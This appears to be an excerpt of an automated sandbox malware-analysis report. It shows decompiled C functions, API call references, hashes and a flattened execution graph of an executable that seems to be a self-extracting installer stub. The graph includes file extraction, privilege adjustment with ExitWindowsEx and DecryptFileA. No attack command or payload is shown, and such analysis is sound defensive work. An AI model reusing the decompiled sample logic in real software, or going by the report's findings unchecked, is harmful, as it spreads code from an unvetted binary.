                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00970000,000007D6,00000005), ref: 0097652A
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00970000,00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00976538
                                                                                                                                                                                                                                              • DialogBoxIndirectParamA.USER32(00970000,00000000,00000547,009719E0,00000000), ref: 00976557
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00976560
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1214682469-0
                                                                                                                                                                                                                                              • Opcode ID: 6f0474176b73b5055df1dfd17773b0fb127c9a2de386c2b97e9fe6378e897da3
                                                                                                                                                                                                                                              • Instruction ID: 5b1ad6e20e35f62f6ef7bb29a9d42396b22a4e8e73623362102b3ac0860046e7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f0474176b73b5055df1dfd17773b0fb127c9a2de386c2b97e9fe6378e897da3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2012673104A05BBDB105F699C08EBB7A6CEBC5761F044125FE0893190D7718C50EAA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                                                                              			E009765E8(char* __ecx) {
                                                                                                                                                                                                                                              				char _t3;
                                                                                                                                                                                                                                              				char _t10;
                                                                                                                                                                                                                                              				char* _t12;
                                                                                                                                                                                                                                              				char* _t14;
                                                                                                                                                                                                                                              				char* _t15;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                                                                                                              				_t15 = __ecx;
                                                                                                                                                                                                                                              				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                              				_t10 = 0;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t3 =  *_t12;
                                                                                                                                                                                                                                              					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                              				} while (_t3 != 0);
                                                                                                                                                                                                                                              				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                              					if(_t16 <= _t15) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                                                              						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                              							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *_t16 = _t10;
                                                                                                                                                                                                                                              						_t10 = 1;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(_t16);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return _t10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              0x009765e8
                                                                                                                                                                                                                                              0x009765ed
                                                                                                                                                                                                                                              0x009765ef
                                                                                                                                                                                                                                              0x009765f2
                                                                                                                                                                                                                                              0x009765f4
                                                                                                                                                                                                                                              0x009765f4
                                                                                                                                                                                                                                              0x009765f6
                                                                                                                                                                                                                                              0x009765f7
                                                                                                                                                                                                                                              0x00976608
                                                                                                                                                                                                                                              0x00976611
                                                                                                                                                                                                                                              0x00976618
                                                                                                                                                                                                                                              0x0097661c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097660e
                                                                                                                                                                                                                                              0x00976623
                                                                                                                                                                                                                                              0x00976625
                                                                                                                                                                                                                                              0x0097663b
                                                                                                                                                                                                                                              0x0097663b
                                                                                                                                                                                                                                              0x0097663d
                                                                                                                                                                                                                                              0x00976641
                                                                                                                                                                                                                                              0x00976610
                                                                                                                                                                                                                                              0x00976610
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00976610
                                                                                                                                                                                                                                              0x00976644
                                                                                                                                                                                                                                              0x00976647
                                                                                                                                                                                                                                              0x00976647
                                                                                                                                                                                                                                              0x00976621
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00972B33), ref: 00976602
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 00976612
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 00976629
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00976635
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Prev$Next
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3260447230-0
                                                                                                                                                                                                                                              • Opcode ID: 60c0fd238cec049dc5964bdd213232c1cc304b27a6ecc7eaa9a1a13cad575d2e
                                                                                                                                                                                                                                              • Instruction ID: 133d17f33ce0666ffa35e88e580ec8e5809b4e9b81fe9798eadc92f03501c443
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60c0fd238cec049dc5964bdd213232c1cc304b27a6ecc7eaa9a1a13cad575d2e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98F0F43300C9506EE7321B398C889BBAF9CCBC7755BA941BFE49D82001D6150D469761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E009769B0() {
                                                                                                                                                                                                                                              				intOrPtr* _t4;
                                                                                                                                                                                                                                              				intOrPtr* _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				 *0x9781f8 = E00976C70();
                                                                                                                                                                                                                                              				__set_app_type(E00976FBE(2));
                                                                                                                                                                                                                                              				 *0x9788a4 =  *0x9788a4 | 0xffffffff;
                                                                                                                                                                                                                                              				 *0x9788a8 =  *0x9788a8 | 0xffffffff;
                                                                                                                                                                                                                                              				_t4 = __p__fmode();
                                                                                                                                                                                                                                              				_t11 =  *0x978528; // 0x0
                                                                                                                                                                                                                                              				 *_t4 = _t11;
                                                                                                                                                                                                                                              				_t5 = __p__commode();
                                                                                                                                                                                                                                              				_t12 =  *0x97851c; // 0x0
                                                                                                                                                                                                                                              				 *_t5 = _t12;
                                                                                                                                                                                                                                              				_t6 = E00977000();
                                                                                                                                                                                                                                              				if( *0x978000 == 0) {
                                                                                                                                                                                                                                              					__setusermatherr(E00977000);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E009771EF(_t6);
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x009769b7
                                                                                                                                                                                                                                              0x009769c2
                                                                                                                                                                                                                                              0x009769c8
                                                                                                                                                                                                                                              0x009769cf
                                                                                                                                                                                                                                              0x009769d8
                                                                                                                                                                                                                                              0x009769de
                                                                                                                                                                                                                                              0x009769e4
                                                                                                                                                                                                                                              0x009769e6
                                                                                                                                                                                                                                              0x009769ec
                                                                                                                                                                                                                                              0x009769f2
                                                                                                                                                                                                                                              0x009769f4
                                                                                                                                                                                                                                              0x00976a00
                                                                                                                                                                                                                                              0x00976a07
                                                                                                                                                                                                                                              0x00976a0d
                                                                                                                                                                                                                                              0x00976a0e
                                                                                                                                                                                                                                              0x00976a15

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00976FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00976FC5
                                                                                                                                                                                                                                              • __set_app_type.MSVCRT ref: 009769C2
                                                                                                                                                                                                                                              • __p__fmode.MSVCRT ref: 009769D8
                                                                                                                                                                                                                                              • __p__commode.MSVCRT ref: 009769E6
                                                                                                                                                                                                                                              • __setusermatherr.MSVCRT ref: 00976A07
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1632413811-0
                                                                                                                                                                                                                                              • Opcode ID: 32a91c6dec600f6bc0dd8719375c74fb8cd90805be0b9b788bd658dc06f933e4
                                                                                                                                                                                                                                              • Instruction ID: e0af6c6ea1522e496f17eb0367d559131190cd6d0845bef0505cc290ff1dd53b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32a91c6dec600f6bc0dd8719375c74fb8cd90805be0b9b788bd658dc06f933e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7F0F87356C3019FD718AF70AD0E70A7B61FB84331B108649E46D862F1CF3A85C0EA12
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:28.6%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                              Total number of Nodes:961
                                                                                                                                                                                                                                              Total number of Limit Nodes:26
                                                                                                                                                                                                                                              execution_graph 2196 1a4ad0 2204 1a3680 2196->2204 2199 1a4ae9 2200 1a4aee WriteFile 2201 1a4b0f 2200->2201 2202 1a4b14 2200->2202 2202->2201 2203 1a4b3b SendDlgItemMessageA 2202->2203 2203->2201 2205 1a3691 MsgWaitForMultipleObjects 2204->2205 2206 1a36e8 2205->2206 2207 1a36a9 PeekMessageA 2205->2207 2206->2199 2206->2200 2207->2205 2208 1a36bc 2207->2208 2208->2205 2208->2206 2209 1a36c7 DispatchMessageA 2208->2209 2210 1a36d1 PeekMessageA 2208->2210 2209->2210 2210->2208 2211 1a4cd0 2212 1a4cf4 2211->2212 2214 1a4d0b 2211->2214 2213 1a4d02 2212->2213 2215 1a4b60 FindCloseChangeNotification 2212->2215 2268 1a6ce0 2213->2268 2214->2213 2217 1a4dcb 2214->2217 2220 1a4d25 2214->2220 2215->2213 2218 1a4dd4 SetDlgItemTextA 2217->2218 2221 1a4de3 2217->2221 2218->2221 2219 1a4e95 2220->2213 2234 1a4c37 2220->2234 2221->2213 2242 1a476d 2221->2242 2224 1a4e38 2224->2213 2251 1a4980 2224->2251 2230 1a4e64 2259 1a47e0 LocalAlloc 2230->2259 2233 1a4e6f 2233->2213 2235 1a4c4c DosDateTimeToFileTime 2234->2235 2236 1a4c88 2234->2236 2235->2236 2237 1a4c5e LocalFileTimeToFileTime 2235->2237 2236->2213 2239 1a4b60 2236->2239 2237->2236 2238 1a4c70 SetFileTime 2237->2238 2238->2236 2240 1a4b92 FindCloseChangeNotification 2239->2240 2241 1a4b76 SetFileAttributesA 2239->2241 2240->2241 2241->2213 2273 1a66ae GetFileAttributesA 2242->2273 2244 1a477b 2244->2224 2246 1a47cc SetFileAttributesA 2247 1a47db 2246->2247 2247->2224 2250 1a47c2 2250->2246 2252 1a4990 2251->2252 2253 1a49c2 lstrcmpA 2252->2253 2254 1a49a5 2252->2254 2256 1a4a0e 2253->2256 2257 1a49ba 2253->2257 2255 1a44b9 20 API calls 2254->2255 2255->2257 2256->2257 2339 1a487a 2256->2339 2257->2213 2257->2230 2260 1a47f6 2259->2260 2262 1a480f 2259->2262 2261 1a44b9 20 API calls 2260->2261 2267 1a480b 2261->2267 2262->2262 2263 1a481b LocalAlloc 2262->2263 2264 1a4831 2263->2264 2263->2267 2265 1a44b9 20 API calls 2264->2265 2266 1a4846 LocalFree 2265->2266 2266->2267 2267->2233 2269 1a6ce8 2268->2269 2270 1a6ceb 2268->2270 2269->2219 2352 1a6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2270->2352 2272 1a6e26 2272->2219 2274 1a4777 2273->2274 2274->2244 2274->2246 2275 1a6517 FindResourceA 2274->2275 2276 1a656b 2275->2276 2277 1a6536 LoadResource 2275->2277 2282 1a44b9 2276->2282 2277->2276 2278 1a6544 DialogBoxIndirectParamA FreeResource 2277->2278 2278->2276 2280 1a47b1 2278->2280 2280->2246 2280->2247 2280->2250 2283 1a44fe LoadStringA 2282->2283 2294 1a455a 2282->2294 2284 1a4562 2283->2284 2285 1a4527 2283->2285 2290 1a45c9 2284->2290 2295 1a457e LocalAlloc 2284->2295 2286 1a681f 10 API calls 2285->2286 2289 1a452c 2286->2289 2287 1a6ce0 4 API calls 2288 1a4689 2287->2288 2288->2280 2296 1a4536 MessageBoxA 2289->2296 2323 1a67c9 2289->2323 2292 1a4607 LocalAlloc 2290->2292 2297 1a45cd 2290->2297 2292->2294 2305 1a45c4 2292->2305 2294->2287 2295->2294 2304 1a45af 2295->2304 2296->2294 2297->2297 2298 1a45d9 LocalAlloc 2297->2298 2298->2294 2301 1a45f3 2298->2301 2299 1a462d MessageBeep 2311 1a681f 2299->2311 2302 1a171e _vsnprintf 2301->2302 2302->2305 2329 1a171e 2304->2329 2305->2299 2308 1a4645 MessageBoxA LocalFree 2308->2294 2309 1a67c9 EnumResourceLanguagesA 2309->2308 2312 1a6940 2311->2312 2313 1a6857 GetVersionExA 2311->2313 2314 1a6ce0 4 API calls 2312->2314 2315 1a687c 2313->2315 2322 1a691a 2313->2322 2316 1a463b 2314->2316 2317 1a68a5 GetSystemMetrics 2315->2317 2315->2322 2316->2308 2316->2309 2318 1a68b5 RegOpenKeyExA 2317->2318 2317->2322 2319 1a68d6 RegQueryValueExA RegCloseKey 2318->2319 2318->2322 2320 1a690c 2319->2320 2319->2322 2333 1a66f9 2320->2333 2322->2312 2324 1a67e2 2323->2324 2327 1a6803 2323->2327 2337 1a6793 EnumResourceLanguagesA 2324->2337 2326 1a67f5 2326->2327 2338 1a6793 EnumResourceLanguagesA 2326->2338 2327->2296 2330 1a172d 2329->2330 2331 1a173d _vsnprintf 2330->2331 2332 1a175d 2330->2332 2331->2332 2332->2305 2334 1a670f 2333->2334 2335 1a6740 CharNextA 2334->2335 2336 1a674b 2334->2336 2335->2334 2336->2322 2337->2326 2338->2327 2340 1a48a2 CreateFileA 2339->2340 2342 1a4908 2340->2342 2343 1a48e9 2340->2343 2342->2257 2343->2342 2344 1a48ee 2343->2344 2347 1a490c 2344->2347 2348 1a48f5 CreateFileA 2347->2348 2349 1a4917 2347->2349 2348->2342 2349->2348 2350 1a4962 CharNextA 2349->2350 2351 1a4953 CreateDirectoryA 2349->2351 2350->2349 2351->2350 2352->2272 3119 1a3210 3120 1a3227 3119->3120 3144 1a328e EndDialog 3119->3144 3121 1a33e2 GetDesktopWindow 3120->3121 3122 1a3235 3120->3122 3172 1a43d0 6 API calls 3121->3172 3124 1a3239 3122->3124 3126 1a324c 3122->3126 3127 1a32dd GetDlgItemTextA 3122->3127 3130 1a3251 3126->3130 3131 1a32c5 EndDialog 3126->3131 3133 1a3366 3127->3133 3138 1a32fc 3127->3138 3129 1a341f GetDlgItem EnableWindow 3129->3124 3130->3124 3132 1a325c LoadStringA 3130->3132 3131->3124 3134 1a327b 3132->3134 3135 1a3294 3132->3135 3136 1a44b9 20 API calls 3133->3136 3140 1a44b9 20 API calls 3134->3140 3157 1a4224 LoadLibraryA 3135->3157 3136->3124 3138->3133 3139 1a3331 GetFileAttributesA 3138->3139 3142 1a333f 3139->3142 3143 1a337c 3139->3143 3140->3144 3147 1a44b9 20 API calls 3142->3147 3146 1a658a CharPrevA 3143->3146 3144->3124 3145 1a32a5 SetDlgItemTextA 3145->3124 3145->3134 3148 1a338d 3146->3148 3149 1a3351 3147->3149 3150 1a58c8 27 API calls 3148->3150 3149->3124 3151 1a335a CreateDirectoryA 3149->3151 3152 1a3394 3150->3152 3151->3133 3151->3143 3152->3133 3153 1a33a4 3152->3153 3154 1a33c7 EndDialog 3153->3154 3155 1a597d 34 API calls 3153->3155 3154->3124 3156 1a33c3 3155->3156 3156->3124 3156->3154 3158 1a43b2 3157->3158 3159 1a4246 GetProcAddress 3157->3159 3163 1a44b9 20 API calls 3158->3163 3160 1a425d GetProcAddress 3159->3160 3161 1a43a4 FreeLibrary 3159->3161 3160->3161 3162 1a4274 GetProcAddress 3160->3162 3161->3158 3162->3161 3165 1a428b 3162->3165 3164 1a329d 3163->3164 3164->3124 3164->3145 3166 1a4295 GetTempPathA 3165->3166 3171 1a42e1 3165->3171 3167 1a42ad 3166->3167 3167->3167 3168 1a42b4 CharPrevA 3167->3168 3169 1a42d0 CharPrevA 3168->3169 3168->3171 3169->3171 3170 1a4390 FreeLibrary 3170->3164 3171->3170 3174 1a4463 SetWindowPos 3172->3174 3175 1a6ce0 4 API calls 3174->3175 3176 1a33f1 SetWindowTextA SendDlgItemMessageA 3175->3176 3176->3124 3176->3129 3177 1a3450 3178 1a345e 3177->3178 3179 1a34d3 EndDialog 3177->3179 3181 1a349a GetDesktopWindow 3178->3181 3185 1a3465 3178->3185 3180 1a346a 3179->3180 3182 1a43d0 11 API calls 3181->3182 3183 1a34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3182->3183 3183->3180 3184 1a348c EndDialog 3184->3180 3185->3180 3185->3184 3186 1a4a50 3187 1a4a9f ReadFile 3186->3187 3189 1a4a66 3186->3189 3188 1a4abb 3187->3188 3189->3188 3190 1a4a82 memcpy 3189->3190 3190->3188 3191 1a6c03 3192 1a6c1e 3191->3192 3193 1a6c17 _exit 3191->3193 3194 1a6c27 _cexit 3192->3194 3195 1a6c32 3192->3195 3193->3192 3194->3195 2353 1a6f40 SetUnhandledExceptionFilter 2354 1a4cc0 GlobalFree 3196 1a4200 3197 1a420b SendMessageA 3196->3197 3198 1a421e 3196->3198 3197->3198 3199 1a3100 3200 1a31b0 3199->3200 3201 1a3111 3199->3201 3203 1a3141 3200->3203 3204 1a31b9 SendDlgItemMessageA 3200->3204 3202 1a311d 3201->3202 3205 1a3149 GetDesktopWindow 3201->3205 3202->3203 3206 1a3138 EndDialog 3202->3206 3204->3203 3207 1a43d0 11 API calls 3205->3207 3206->3203 3208 1a315d 6 API calls 3207->3208 3208->3203 3209 1a4bc0 3211 1a4bd7 3209->3211 3212 1a4c05 3209->3212 3210 1a4c1b SetFilePointer 3210->3211 3212->3210 3212->3211 3213 1a30c0 3214 1a30de CallWindowProcA 3213->3214 3215 1a30ce 3213->3215 3216 1a30da 3214->3216 3215->3214 3215->3216 3217 1a63c0 3218 1a6407 3217->3218 3219 1a658a CharPrevA 3218->3219 3220 1a6415 CreateFileA 3219->3220 3221 1a643a 3220->3221 3222 1a6448 WriteFile 3220->3222 3225 1a6ce0 4 API calls 3221->3225 3223 1a6465 CloseHandle 3222->3223 3223->3221 3226 1a648f 3225->3226 3227 1a7270 _except_handler4_common 3228 1a69b0 3229 1a69b5 3228->3229 3237 1a6fbe GetModuleHandleW 3229->3237 3231 1a69c1 __set_app_type __p__fmode __p__commode 3232 1a69f9 3231->3232 3233 1a6a0e 3232->3233 3234 1a6a02 __setusermatherr 3232->3234 3239 1a71ef _controlfp 3233->3239 3234->3233 3236 1a6a13 3238 1a6fcf 3237->3238 3238->3231 3239->3236 3240 1a34f0 3241 1a3504 3240->3241 3259 1a35b8 3240->3259 3242 1a351b 3241->3242 3243 1a35be GetDesktopWindow 3241->3243 3241->3259 3246 1a354f 3242->3246 3247 1a351f 3242->3247 3245 1a43d0 11 API calls 3243->3245 3244 1a3526 3249 1a35d6 3245->3249 3246->3244 3251 1a3559 ResetEvent 3246->3251 3247->3244 3250 1a352d TerminateThread EndDialog 3247->3250 3248 1a3671 EndDialog 3248->3244 3252 1a361d SetWindowTextA CreateThread 3249->3252 3253 1a35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3249->3253 3250->3244 3254 1a44b9 20 API calls 3251->3254 3252->3244 3255 1a3646 3252->3255 3253->3252 3256 1a3581 3254->3256 3257 1a44b9 20 API calls 3255->3257 3258 1a359b SetEvent 3256->3258 3260 1a358a SetEvent 3256->3260 3257->3259 3261 1a3680 4 API calls 3258->3261 3259->3244 3259->3248 3260->3244 3261->3259 3262 1a6ef0 3263 1a6f2d 3262->3263 3265 1a6f02 3262->3265 3264 1a6f27 ?terminate@ 3264->3263 3265->3263 3265->3264 3266 1a6bef _XcptFilter 2355 1a4ca0 GlobalAlloc 2356 1a6a60 2373 1a7155 2356->2373 2358 1a6a65 2359 1a6a76 GetStartupInfoW 2358->2359 2360 1a6a93 2359->2360 2361 1a6aa8 2360->2361 2362 1a6aaf Sleep 2360->2362 2363 1a6ac7 _amsg_exit 2361->2363 2364 1a6ad1 2361->2364 2362->2360 2363->2364 2365 1a6b13 _initterm 2364->2365 2367 1a6af4 2364->2367 2371 1a6b2e __IsNonwritableInCurrentImage 2364->2371 2365->2371 2366 1a6bd6 _ismbblead 2366->2371 2368 1a6c1e 2368->2367 2370 1a6c27 _cexit 2368->2370 2370->2367 2371->2366 2371->2368 2372 1a6bbe exit 2371->2372 2378 1a2bfb GetVersion 2371->2378 2372->2371 2374 1a717a 2373->2374 2375 1a717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2373->2375 2374->2375 2376 1a71e2 2374->2376 2377 1a71cd 2375->2377 2376->2358 2377->2376 2379 1a2c0f 2378->2379 2380 1a2c50 2378->2380 2379->2380 2381 1a2c13 GetModuleHandleW 2379->2381 2395 1a2caa memset memset memset 2380->2395 2381->2380 2384 1a2c22 GetProcAddress 2381->2384 2384->2380 2392 1a2c34 2384->2392 2385 1a2c8e 2387 1a2c9e 2385->2387 2388 1a2c97 CloseHandle 2385->2388 2387->2371 2388->2387 2392->2380 2393 1a2c89 2489 1a1f90 2393->2489 2506 1a468f FindResourceA SizeofResource 2395->2506 2398 1a2ef3 2400 1a44b9 20 API calls 2398->2400 2399 1a2d2d CreateEventA SetEvent 2401 1a468f 7 API calls 2399->2401 2403 1a2d6e 2400->2403 2402 1a2d57 2401->2402 2404 1a2d5b 2402->2404 2406 1a2e1f 2402->2406 2409 1a468f 7 API calls 2402->2409 2407 1a6ce0 4 API calls 2403->2407 2405 1a44b9 20 API calls 2404->2405 2405->2403 2511 1a5c9e 2406->2511 2410 1a2c62 2407->2410 2412 1a2d9f 2409->2412 2410->2385 2436 1a2f1d 2410->2436 2412->2404 2415 1a2da3 CreateMutexA 2412->2415 2413 1a2e3a 2416 1a2e52 FindResourceA 2413->2416 2417 1a2e43 2413->2417 2414 1a2e30 2414->2398 2415->2406 2418 1a2dbd GetLastError 2415->2418 2421 1a2e6e 2416->2421 2422 1a2e64 LoadResource 2416->2422 2537 1a2390 2417->2537 2418->2406 2420 1a2dca 2418->2420 2424 1a2dea 2420->2424 2425 1a2dd5 2420->2425 2423 1a2e4d 2421->2423 2552 1a36ee GetVersionExA 2421->2552 2422->2421 2423->2403 2427 1a44b9 20 API calls 2424->2427 2426 1a44b9 20 API calls 2425->2426 2430 1a2de8 2426->2430 2428 1a2dff 2427->2428 2428->2406 2431 1a2e04 CloseHandle 2428->2431 2430->2431 2431->2403 2435 1a6517 24 API calls 2435->2423 2437 1a2f3f 2436->2437 2438 1a2f6c 2436->2438 2439 1a2f5f 2437->2439 2641 1a51e5 2437->2641 2660 1a5164 2438->2660 2788 1a3a3f 2439->2788 2441 1a2f71 2444 1a303c 2441->2444 2673 1a55a0 2441->2673 2449 1a6ce0 4 API calls 2444->2449 2451 1a2c6b 2449->2451 2450 1a2f86 GetSystemDirectoryA 2452 1a658a CharPrevA 2450->2452 2476 1a52b6 2451->2476 2453 1a2fab LoadLibraryA 2452->2453 2454 1a2fc0 GetProcAddress 2453->2454 2455 1a2ff7 FreeLibrary 2453->2455 2454->2455 2456 1a2fd6 DecryptFileA 2454->2456 2457 1a3006 2455->2457 2458 1a3017 SetCurrentDirectoryA 2455->2458 2456->2455 2468 1a2ff0 2456->2468 2457->2458 2721 1a621e GetWindowsDirectoryA 2457->2721 2459 1a3026 2458->2459 2460 1a3054 2458->2460 2461 1a44b9 20 API calls 2459->2461 2463 1a3061 2460->2463 2731 1a3b26 2460->2731 2467 1a3037 2461->2467 2463->2444 2465 1a307a 2463->2465 2740 1a256d 2463->2740 2471 1a3098 2465->2471 2751 1a3ba2 2465->2751 2807 1a6285 GetLastError 2467->2807 2468->2455 2471->2444 2474 1a30af 2471->2474 2809 1a4169 2474->2809 2477 1a52d6 2476->2477 2486 1a5316 2476->2486 2478 1a5300 LocalFree LocalFree 2477->2478 2481 1a52eb SetFileAttributesA DeleteFileA 2477->2481 2478->2477 2478->2486 2479 1a538c 2482 1a6ce0 4 API calls 2479->2482 2480 1a5374 2480->2479 3115 1a1fe1 2480->3115 2481->2478 2484 1a2c72 2482->2484 2484->2385 2484->2393 2485 1a535e SetCurrentDirectoryA 2487 1a2390 13 API calls 2485->2487 2486->2480 2486->2485 2488 1a65e8 4 API calls 2486->2488 2487->2480 2488->2485 2490 1a1f9a 2489->2490 2491 1a1f9f 2489->2491 2492 1a1ea7 15 API calls 2490->2492 2493 1a1fc0 2491->2493 2496 1a44b9 20 API calls 2491->2496 2497 1a1fd9 2491->2497 2492->2491 2494 1a1ee2 GetCurrentProcess OpenProcessToken 2493->2494 2495 1a1fcf ExitWindowsEx 2493->2495 2493->2497 2499 1a1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2494->2499 2502 1a1f0e 2494->2502 2495->2497 2496->2493 2497->2385 2500 1a1f6b ExitWindowsEx 2499->2500 2499->2502 2501 1a1f1f 2500->2501 2500->2502 2504 1a6ce0 4 API calls 2501->2504 2503 1a44b9 20 API calls 2502->2503 2503->2501 2505 1a1f8c 2504->2505 2505->2385 2507 1a2d1a 2506->2507 2508 1a46b6 2506->2508 2507->2398 2507->2399 2508->2507 2509 1a46be FindResourceA LoadResource LockResource 2508->2509 2509->2507 2510 1a46df memcpy_s FreeResource 2509->2510 2510->2507 2518 1a5e17 2511->2518 2535 1a5cc3 2511->2535 2512 1a5dd0 2516 1a5dec GetModuleFileNameA 2512->2516 2512->2518 2513 1a6ce0 4 API calls 2515 1a2e2c 2513->2515 2514 1a5ced CharNextA 2514->2535 2515->2413 2515->2414 2517 1a5e0a 2516->2517 2516->2518 2587 1a66c8 2517->2587 2518->2513 2520 1a6218 2596 1a6e2a 2520->2596 2523 1a5e36 CharUpperA 2524 1a61d0 2523->2524 2523->2535 